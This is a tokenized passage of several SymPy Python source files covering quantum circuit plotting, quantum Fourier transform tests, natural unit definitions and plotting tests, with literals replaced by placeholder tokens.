arange ( <NUM_LIT:0.0> , self . nqubits * scale , scale , dtype = float ) <EOL> gate_grid = np . arange ( <NUM_LIT:0.0> , self . ngates * scale , scale , dtype = float ) <EOL> self . _wire_grid = wire_grid <EOL> self . _gate_grid = gate_grid <EOL> def _create_figure ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _figure = pyplot . figure ( <EOL> figsize = ( self . ngates * self . scale , self . nqubits * self . scale ) , <EOL> facecolor = '<STR_LIT:w>' , <EOL> edgecolor = '<STR_LIT:w>' <EOL> ) <EOL> ax = self . _figure . add_subplot ( <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> frameon = True <EOL> ) <EOL> ax . set_axis_off ( ) <EOL> offset = <NUM_LIT:0.5> * self . scale <EOL> ax . set_xlim ( self . _gate_grid [ <NUM_LIT:0> ] - offset , self . _gate_grid [ - <NUM_LIT:1> ] + offset ) <EOL> ax . set_ylim ( self . _wire_grid [ <NUM_LIT:0> ] - offset , self . _wire_grid [ - <NUM_LIT:1> ] + offset ) <EOL> ax . set_aspect ( '<STR_LIT>' ) <EOL> self . _axes = ax <EOL> def _plot_wires ( self ) : <EOL> """<STR_LIT>""" <EOL> xstart = self . _gate_grid [ <NUM_LIT:0> ] <EOL> xstop = self . _gate_grid [ - <NUM_LIT:1> ] <EOL> xdata = ( xstart - self . scale , xstop + self . scale ) <EOL> for i in range ( self . nqubits ) : <EOL> ydata = ( self . _wire_grid [ i ] , self . _wire_grid [ i ] ) <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> if self . labels : <EOL> init_label_buffer = <NUM_LIT:0> <EOL> if self . inits . get ( self . labels [ i ] ) : init_label_buffer = <NUM_LIT> <EOL> self . _axes . text ( <EOL> xdata [ <NUM_LIT:0> ] - self . label_buffer - init_label_buffer , ydata [ <NUM_LIT:0> ] , <EOL> render_label ( self . labels [ i ] , self . inits ) , <EOL> size = self . fontsize , <EOL> color = '<STR_LIT:k>' , ha = '<STR_LIT>' , va = '<STR_LIT>' ) <EOL> self . _plot_measured_wires ( ) <EOL> def _plot_measured_wires ( self ) : <EOL> ismeasured = self . 
_measurements ( ) <EOL> xstop = self . _gate_grid [ - <NUM_LIT:1> ] <EOL> dy = <NUM_LIT> <EOL> for im in ismeasured : <EOL> xdata = ( self . _gate_grid [ ismeasured [ im ] ] , xstop + self . scale ) <EOL> ydata = ( self . _wire_grid [ im ] + dy , self . _wire_grid [ im ] + dy ) <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> for i , g in enumerate ( self . _gates ( ) ) : <EOL> if isinstance ( g , CGate ) or isinstance ( g , CGateS ) : <EOL> wires = g . controls + g . targets <EOL> for wire in wires : <EOL> if wire in ismeasured and self . _gate_grid [ i ] > self . _gate_grid [ ismeasured [ wire ] ] : <EOL> ydata = min ( wires ) , max ( wires ) <EOL> xdata = self . _gate_grid [ i ] - dy , self . _gate_grid [ i ] - dy <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> def _gates ( self ) : <EOL> """<STR_LIT>""" <EOL> gates = [ ] <EOL> if isinstance ( self . circuit , Mul ) : <EOL> for g in reversed ( self . circuit . args ) : <EOL> if isinstance ( g , Gate ) : <EOL> gates . append ( g ) <EOL> elif isinstance ( self . circuit , Gate ) : <EOL> gates . append ( self . circuit ) <EOL> return gates <EOL> def _plot_gates ( self ) : <EOL> """<STR_LIT>""" <EOL> for i , gate in enumerate ( self . _gates ( ) ) : <EOL> gate . plot_gate ( self , i ) <EOL> def _measurements ( self ) : <EOL> """<STR_LIT>""" <EOL> ismeasured = { } <EOL> for i , g in enumerate ( self . _gates ( ) ) : <EOL> if getattr ( g , '<STR_LIT>' , False ) : <EOL> for target in g . targets : <EOL> if target in ismeasured : <EOL> if ismeasured [ target ] > i : <EOL> ismeasured [ target ] = i <EOL> else : <EOL> ismeasured [ target ] = i <EOL> return ismeasured <EOL> def _finish ( self ) : <EOL> for o in self . _figure . findobj ( ) : <EOL> o . 
set_clip_on ( False ) <EOL> def one_qubit_box ( self , t , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> self . _axes . text ( <EOL> x , y , t , <EOL> color = '<STR_LIT:k>' , <EOL> ha = '<STR_LIT>' , <EOL> va = '<STR_LIT>' , <EOL> bbox = dict ( ec = '<STR_LIT:k>' , fc = '<STR_LIT:w>' , fill = True , lw = self . linewidth ) , <EOL> size = self . fontsize <EOL> ) <EOL> def two_qubit_box ( self , t , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] + <NUM_LIT:0.5> <EOL> print ( self . _gate_grid ) <EOL> print ( self . _wire_grid ) <EOL> obj = self . _axes . text ( <EOL> x , y , t , <EOL> color = '<STR_LIT:k>' , <EOL> ha = '<STR_LIT>' , <EOL> va = '<STR_LIT>' , <EOL> bbox = dict ( ec = '<STR_LIT:k>' , fc = '<STR_LIT:w>' , fill = True , lw = self . linewidth ) , <EOL> size = self . fontsize <EOL> ) <EOL> def control_line ( self , gate_idx , min_wire , max_wire ) : <EOL> """<STR_LIT>""" <EOL> xdata = ( self . _gate_grid [ gate_idx ] , self . _gate_grid [ gate_idx ] ) <EOL> ydata = ( self . _wire_grid [ min_wire ] , self . _wire_grid [ max_wire ] ) <EOL> line = Line2D ( <EOL> xdata , ydata , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( line ) <EOL> def control_point ( self , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> radius = self . control_radius <EOL> c = Circle ( <EOL> ( x , y ) , <EOL> radius * self . scale , <EOL> ec = '<STR_LIT:k>' , <EOL> fc = '<STR_LIT:k>' , <EOL> fill = True , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_patch ( c ) <EOL> def not_point ( self , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> radius = self . 
not_radius <EOL> c = Circle ( <EOL> ( x , y ) , <EOL> radius , <EOL> ec = '<STR_LIT:k>' , <EOL> fc = '<STR_LIT:w>' , <EOL> fill = False , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_patch ( c ) <EOL> l = Line2D ( <EOL> ( x , x ) , ( y - radius , y + radius ) , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( l ) <EOL> def swap_point ( self , gate_idx , wire_idx ) : <EOL> """<STR_LIT>""" <EOL> x = self . _gate_grid [ gate_idx ] <EOL> y = self . _wire_grid [ wire_idx ] <EOL> d = self . swap_delta <EOL> l1 = Line2D ( <EOL> ( x - d , x + d ) , <EOL> ( y - d , y + d ) , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> l2 = Line2D ( <EOL> ( x - d , x + d ) , <EOL> ( y + d , y - d ) , <EOL> color = '<STR_LIT:k>' , <EOL> lw = self . linewidth <EOL> ) <EOL> self . _axes . add_line ( l1 ) <EOL> self . _axes . add_line ( l2 ) <EOL> def circuit_plot ( c , nqubits , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return CircuitPlot ( c , nqubits , ** kwargs ) <EOL> def render_label ( label , inits = { } ) : <EOL> """<STR_LIT>""" <EOL> init = inits . get ( label ) <EOL> if init : <EOL> return r'<STR_LIT>' % ( label , init ) <EOL> return r'<STR_LIT>' % label <EOL> def labeller ( n , symbol = '<STR_LIT:q>' ) : <EOL> """<STR_LIT>""" <EOL> return [ '<STR_LIT>' % ( symbol , n - i - <NUM_LIT:1> ) for i in range ( n ) ] <EOL> class Mz ( OneQubitGate ) : <EOL> """<STR_LIT>""" <EOL> measurement = True <EOL> gate_name = '<STR_LIT>' <EOL> gate_name_latex = u'<STR_LIT>' <EOL> class Mx ( OneQubitGate ) : <EOL> """<STR_LIT>""" <EOL> measurement = True <EOL> gate_name = '<STR_LIT>' <EOL> gate_name_latex = u'<STR_LIT>' <EOL> class CreateOneQubitGate ( ManagedProperties ) : <EOL> def __new__ ( mcl , name , latexname = None ) : <EOL> if not latexname : <EOL> latexname = name <EOL> return BasicMeta . 
__new__ ( mcl , name + "<STR_LIT>" , ( OneQubitGate , ) , <EOL> { '<STR_LIT>' : name , '<STR_LIT>' : latexname } ) <EOL> def CreateCGate ( name , latexname = None ) : <EOL> """<STR_LIT>""" <EOL> if not latexname : <EOL> latexname = name <EOL> onequbitgate = CreateOneQubitGate ( name , latexname ) <EOL> def ControlledGate ( ctrls , target ) : <EOL> return CGate ( tuple ( ctrls ) , onequbitgate ( target ) ) <EOL> return ControlledGate </s>
<s> from sympy import exp , I , Matrix , pi , sqrt , Symbol <EOL> from sympy . core . compatibility import range <EOL> from sympy . physics . quantum . qft import QFT , IQFT , RkGate <EOL> from sympy . physics . quantum . gate import ( ZGate , SwapGate , HadamardGate , CGate , <EOL> PhaseGate , TGate ) <EOL> from sympy . physics . quantum . qubit import Qubit <EOL> from sympy . physics . quantum . qapply import qapply <EOL> from sympy . physics . quantum . represent import represent <EOL> def test_RkGate ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> assert RkGate ( <NUM_LIT:1> , x ) . k == x <EOL> assert RkGate ( <NUM_LIT:1> , x ) . targets == ( <NUM_LIT:1> , ) <EOL> assert RkGate ( <NUM_LIT:1> , <NUM_LIT:1> ) == ZGate ( <NUM_LIT:1> ) <EOL> assert RkGate ( <NUM_LIT:2> , <NUM_LIT:2> ) == PhaseGate ( <NUM_LIT:2> ) <EOL> assert RkGate ( <NUM_LIT:3> , <NUM_LIT:3> ) == TGate ( <NUM_LIT:3> ) <EOL> assert represent ( <EOL> RkGate ( <NUM_LIT:0> , x ) , nqubits = <NUM_LIT:1> ) == Matrix ( [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , exp ( <NUM_LIT:2> * I * pi / <NUM_LIT:2> ** x ) ] ] ) <EOL> def test_quantum_fourier ( ) : <EOL> assert QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) . decompose ( ) == SwapGate ( <NUM_LIT:0> , <NUM_LIT:2> ) * HadamardGate ( <NUM_LIT:0> ) * CGate ( ( <NUM_LIT:0> , ) , PhaseGate ( <NUM_LIT:1> ) ) * HadamardGate ( <NUM_LIT:1> ) * CGate ( ( <NUM_LIT:0> , ) , TGate ( <NUM_LIT:2> ) ) * CGate ( ( <NUM_LIT:1> , ) , PhaseGate ( <NUM_LIT:2> ) ) * HadamardGate ( <NUM_LIT:2> ) <EOL> assert IQFT ( <NUM_LIT:0> , <NUM_LIT:3> ) . 
decompose ( ) == HadamardGate ( <NUM_LIT:2> ) * CGate ( ( <NUM_LIT:1> , ) , RkGate ( <NUM_LIT:2> , - <NUM_LIT:2> ) ) * CGate ( ( <NUM_LIT:0> , ) , RkGate ( <NUM_LIT:2> , - <NUM_LIT:3> ) ) * HadamardGate ( <NUM_LIT:1> ) * CGate ( ( <NUM_LIT:0> , ) , RkGate ( <NUM_LIT:1> , - <NUM_LIT:2> ) ) * HadamardGate ( <NUM_LIT:0> ) * SwapGate ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert represent ( QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) , nqubits = <NUM_LIT:3> ) == Matrix ( [ [ exp ( <NUM_LIT:2> * pi * I / <NUM_LIT:8> ) ** ( i * j % <NUM_LIT:8> ) / sqrt ( <NUM_LIT:8> ) for i in range ( <NUM_LIT:8> ) ] for j in range ( <NUM_LIT:8> ) ] ) <EOL> assert QFT ( <NUM_LIT:0> , <NUM_LIT:4> ) . decompose ( ) <EOL> assert qapply ( QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) . decompose ( ) * Qubit ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) . expand ( ) == qapply ( <EOL> HadamardGate ( <NUM_LIT:0> ) * HadamardGate ( <NUM_LIT:1> ) * HadamardGate ( <NUM_LIT:2> ) * Qubit ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ) . expand ( ) <EOL> def test_qft_represent ( ) : <EOL> c = QFT ( <NUM_LIT:0> , <NUM_LIT:3> ) <EOL> a = represent ( c , nqubits = <NUM_LIT:3> ) <EOL> b = represent ( c . decompose ( ) , nqubits = <NUM_LIT:3> ) <EOL> assert a . evalf ( prec = <NUM_LIT:10> ) == b . evalf ( prec = <NUM_LIT:10> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from sympy . physics . unitsystems . dimensions import Dimension , DimensionSystem <EOL> from sympy . physics . unitsystems . units import Unit , Constant , UnitSystem <EOL> from sympy . physics . unitsystems . prefixes import PREFIXES , prefix_unit <EOL> action = Dimension ( name = "<STR_LIT:action>" , symbol = "<STR_LIT:A>" , length = <NUM_LIT:2> , mass = <NUM_LIT:1> , time = - <NUM_LIT:1> ) <EOL> energy = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:E>" , length = <NUM_LIT:2> , mass = <NUM_LIT:1> , time = - <NUM_LIT:2> ) <EOL> velocity = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT>" , length = <NUM_LIT:1> , time = - <NUM_LIT:1> ) <EOL> length = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:L>" , length = <NUM_LIT:1> ) <EOL> mass = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:M>" , mass = <NUM_LIT:1> ) <EOL> time = Dimension ( name = "<STR_LIT:time>" , symbol = "<STR_LIT:T>" , time = <NUM_LIT:1> ) <EOL> acceleration = Dimension ( name = "<STR_LIT>" , length = <NUM_LIT:1> , time = - <NUM_LIT:2> ) <EOL> momentum = Dimension ( name = "<STR_LIT>" , mass = <NUM_LIT:1> , length = <NUM_LIT:1> , time = - <NUM_LIT:1> ) <EOL> force = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:F>" , mass = <NUM_LIT:1> , length = <NUM_LIT:1> , time = - <NUM_LIT:2> ) <EOL> power = Dimension ( name = "<STR_LIT>" , length = <NUM_LIT:2> , mass = <NUM_LIT:1> , time = - <NUM_LIT:3> ) <EOL> frequency = Dimension ( name = "<STR_LIT>" , symbol = "<STR_LIT:f>" , time = - <NUM_LIT:1> ) <EOL> dims = ( length , mass , time , momentum , force , energy , power , frequency ) <EOL> natural_dim = DimensionSystem ( base = ( action , energy , velocity ) , dims = dims , <EOL> name = "<STR_LIT>" ) <EOL> hbar = Constant ( action , factor = <NUM_LIT> , abbrev = "<STR_LIT>" ) <EOL> eV = Unit ( energy , factor = <NUM_LIT> , abbrev = "<STR_LIT>" ) <EOL> c = Constant ( velocity , factor = <NUM_LIT> , abbrev = 
"<STR_LIT:c>" ) <EOL> units = prefix_unit ( eV , PREFIXES ) <EOL> natural = UnitSystem ( base = ( hbar , eV , c ) , units = units , name = "<STR_LIT>" ) </s>
<s> from . plot import plot_backends <EOL> from . plot_implicit import plot_implicit <EOL> from . textplot import textplot <EOL> from . pygletplot import PygletPlot <EOL> from . plot import ( plot , plot_parametric , plot3d , plot3d_parametric_surface , <EOL> plot3d_parametric_line ) </s>
<s> from sympy import ( pi , sin , cos , Symbol , Integral , Sum , sqrt , log , <EOL> oo , LambertW , I , meijerg , exp_polar , Max , Piecewise ) <EOL> from sympy . plotting import ( plot , plot_parametric , plot3d_parametric_line , <EOL> plot3d , plot3d_parametric_surface ) <EOL> from sympy . plotting . plot import unset_show <EOL> from sympy . utilities . pytest import skip , raises <EOL> from sympy . plotting . experimental_lambdify import lambdify <EOL> from sympy . external import import_module <EOL> from sympy . core . decorators import wraps <EOL> from tempfile import NamedTemporaryFile <EOL> import os <EOL> import sys <EOL> import warnings <EOL> class MockPrint ( object ) : <EOL> def write ( self , s ) : <EOL> pass <EOL> def flush ( self ) : <EOL> pass <EOL> encoding = '<STR_LIT:utf-8>' <EOL> def disable_print ( func , * args , ** kwargs ) : <EOL> @ wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> sys . stdout = MockPrint ( ) <EOL> func ( * args , ** kwargs ) <EOL> sys . stdout = sys . __stdout__ <EOL> return wrapper <EOL> unset_show ( ) <EOL> class TmpFileManager : <EOL> tmp_files = [ ] <EOL> @ classmethod <EOL> def tmp_file ( cls , name = '<STR_LIT>' ) : <EOL> cls . tmp_files . append ( NamedTemporaryFile ( prefix = name , suffix = '<STR_LIT>' ) . name ) <EOL> return cls . tmp_files [ - <NUM_LIT:1> ] <EOL> @ classmethod <EOL> def cleanup ( cls ) : <EOL> map ( os . remove , cls . tmp_files ) <EOL> def plot_and_save ( name ) : <EOL> tmp_file = TmpFileManager . tmp_file <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> y = Symbol ( '<STR_LIT:y>' ) <EOL> z = Symbol ( '<STR_LIT:z>' ) <EOL> p = plot ( x ) <EOL> p = plot ( x * sin ( x ) , x * cos ( x ) ) <EOL> p . extend ( p ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : a <EOL> p [ <NUM_LIT:1> ] . line_color = '<STR_LIT:b>' <EOL> p . title = '<STR_LIT>' <EOL> p . xlabel = '<STR_LIT>' <EOL> p [ <NUM_LIT:1> ] . label = '<STR_LIT>' <EOL> p . legend = True <EOL> p . 
aspect_ratio = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> p . xlim = ( - <NUM_LIT:15> , <NUM_LIT:20> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p . extend ( plot ( x + <NUM_LIT:1> ) ) <EOL> p . append ( plot ( x + <NUM_LIT:3> , x ** <NUM_LIT:2> ) [ <NUM_LIT:1> ] ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:2> ] = plot ( x ** <NUM_LIT:2> , ( x , - <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( sin ( x ) , ( x , - <NUM_LIT:2> * pi , <NUM_LIT:4> * pi ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( sin ( x ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( ( x ** <NUM_LIT:2> , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) , ( x ** <NUM_LIT:3> , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> raises ( ValueError , lambda : plot ( x , y ) ) <EOL> p = plot ( Piecewise ( ( <NUM_LIT:1> , x > <NUM_LIT:0> ) , ( <NUM_LIT:0> , True ) ) , ( x , - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> plot_parametric ( sin ( x ) , cos ( x ) ) . save ( tmp_file ( ) ) <EOL> p = plot_parametric ( sin ( x ) , cos ( x ) , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( ( sin ( x ) , cos ( x ) ) , ( x , sin ( x ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( ( sin ( x ) , cos ( x ) , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) ) , ( x , sin ( x ) , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( x , sin ( x ) , depth = <NUM_LIT> ) <EOL> p . 
save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot_parametric ( cos ( x ) , sin ( x ) , adaptive = False , nb_of_points = <NUM_LIT> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( sin ( x ) , cos ( x ) , x ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( <EOL> ( sin ( x ) , cos ( x ) , x , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) , ( cos ( x ) , sin ( x ) , x , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( sin ( x ) , cos ( x ) , x , nb_of_points = <NUM_LIT:30> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( x * y ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( - x * y , x * y , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( <EOL> ( x * y , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) , ( y , - <NUM_LIT:3> , <NUM_LIT:3> ) ) , ( - x * y , ( x , - <NUM_LIT:3> , <NUM_LIT:3> ) , ( y , - <NUM_LIT:3> , <NUM_LIT:3> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_surface ( sin ( x + y ) , cos ( x - y ) , x - y ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_surface ( <EOL> ( x * sin ( z ) , x * cos ( z ) , z , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) , ( z , - <NUM_LIT:5> , <NUM_LIT:5> ) ) , <EOL> ( sin ( x + y ) , cos ( x - y ) , x - y , ( x , - <NUM_LIT:5> , <NUM_LIT:5> ) , ( y , - <NUM_LIT:5> , <NUM_LIT:5> ) ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( sin ( x ) ) <EOL> p [ <NUM_LIT:0> ] . 
line_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( x * sin ( x ) , x * cos ( x ) , ( x , <NUM_LIT:0> , <NUM_LIT:10> ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d_parametric_line ( sin ( x ) + <NUM_LIT:0.1> * sin ( x ) * cos ( <NUM_LIT:7> * x ) , <EOL> cos ( x ) + <NUM_LIT:0.1> * cos ( x ) * cos ( <NUM_LIT:7> * x ) , <EOL> <NUM_LIT:0.1> * sin ( <NUM_LIT:7> * x ) , <EOL> ( x , <NUM_LIT:0> , <NUM_LIT:2> * pi ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a : sin ( <NUM_LIT:4> * a ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . line_color = lambda a , b , c : c <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot3d ( sin ( x ) * y , ( x , <NUM_LIT:0> , <NUM_LIT:6> * pi ) , ( y , - <NUM_LIT:5> , <NUM_LIT:5> ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b : b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b , c : c <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b , c : sqrt ( ( a - <NUM_LIT:3> * pi ) ** <NUM_LIT:2> + b ** <NUM_LIT:2> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . 
close ( ) <EOL> p = plot3d_parametric_surface ( x * cos ( <NUM_LIT:4> * y ) , x * sin ( <NUM_LIT:4> * y ) , y , <EOL> ( x , - <NUM_LIT:1> , <NUM_LIT:1> ) , ( y , - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a : a <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b : a * b <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p [ <NUM_LIT:0> ] . surface_color = lambda a , b , c : sqrt ( a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> i = Integral ( log ( ( sin ( x ) ** <NUM_LIT:2> + <NUM_LIT:1> ) * sqrt ( x ** <NUM_LIT:2> + <NUM_LIT:1> ) ) , ( x , <NUM_LIT:0> , y ) ) <EOL> p = plot ( i , ( y , <NUM_LIT:1> , <NUM_LIT:5> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> assert len ( w ) == <NUM_LIT:1> <EOL> assert issubclass ( w [ - <NUM_LIT:1> ] . category , UserWarning ) <EOL> assert "<STR_LIT>" in str ( w [ <NUM_LIT:0> ] . message ) <EOL> s = Sum ( <NUM_LIT:1> / x ** y , ( x , <NUM_LIT:1> , oo ) ) <EOL> p = plot ( s , ( y , <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> p = plot ( Sum ( <NUM_LIT:1> / x , ( x , <NUM_LIT:1> , y ) ) , ( y , <NUM_LIT:2> , <NUM_LIT:10> ) , show = False ) <EOL> p [ <NUM_LIT:0> ] . only_integers = True <EOL> p [ <NUM_LIT:0> ] . steps = True <EOL> p . save ( tmp_file ( '<STR_LIT>' % name ) ) <EOL> p . _backend . close ( ) <EOL> plot ( sin ( x ) + I * cos ( x ) ) . save ( tmp_file ( ) ) <EOL> plot ( sqrt ( sqrt ( - x ) ) ) . save ( tmp_file ( ) ) <EOL> plot ( LambertW ( x ) ) . save ( tmp_file ( ) ) <EOL> plot ( sqrt ( LambertW ( x ) ) ) . 
save ( tmp_file ( ) ) <EOL> plot ( ( meijerg ( ( ( <NUM_LIT:1> / <NUM_LIT:2> , ) , ( ) ) , ( ( <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT:2> ) , ( ) ) , <NUM_LIT:5> * x ** <NUM_LIT:2> * exp_polar ( - I * pi ) / <NUM_LIT:2> ) <EOL> + meijerg ( ( ( <NUM_LIT:1> / <NUM_LIT:2> , ) , ( ) ) , ( ( <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT:2> ) , ( ) ) , <EOL> <NUM_LIT:5> * x ** <NUM_LIT:2> * exp_polar ( I * pi ) / <NUM_LIT:2> ) ) / ( <NUM_LIT> * pi ) , ( x , <NUM_LIT> , <NUM_LIT> ) ) . save ( tmp_file ( ) ) <EOL> def test_matplotlib ( ) : <EOL> matplotlib = import_module ( '<STR_LIT>' , min_module_version = '<STR_LIT>' , catch = ( RuntimeError , ) ) <EOL> if matplotlib : <EOL> try : <EOL> plot_and_save ( '<STR_LIT:test>' ) <EOL> finally : <EOL> TmpFileManager . cleanup ( ) <EOL> else : <EOL> skip ( "<STR_LIT>" ) <EOL> def test_experimental_lambify ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> f = lambdify ( [ x ] , Max ( x , <NUM_LIT:5> ) ) <EOL> assert Max ( <NUM_LIT:2> , <NUM_LIT:5> ) == <NUM_LIT:5> <EOL> assert Max ( <NUM_LIT:5> , <NUM_LIT:7> ) == <NUM_LIT:7> <EOL> x = Symbol 